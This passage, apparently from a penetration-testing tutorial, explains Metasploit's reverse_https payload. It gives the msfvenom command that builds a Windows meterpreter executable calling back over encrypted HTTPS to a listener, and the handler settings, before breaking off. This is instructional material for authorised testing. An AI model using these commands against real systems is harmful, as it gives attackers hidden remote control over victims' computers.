The reverse_tcp payload in Metasploit is a very powerful and basic payload but has its own drawbacks. One of the drawbacks is its non-encrypted nature for the second stage. However, Metasploit does have another payload with SSL support: reverse_https!
The reverse_https payload can be generated using the following command:
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.2.6 lport=8443 -f exe -o SharedPayloads/revHttps8443.exe
Let's set up the handler for reverse_https as well, using the following commands:
Set payload windows/meterpreter/reverse_https Set lhost 192.168.2.6 Set lport 8443 Set exitfunc thread Set exitonsession ...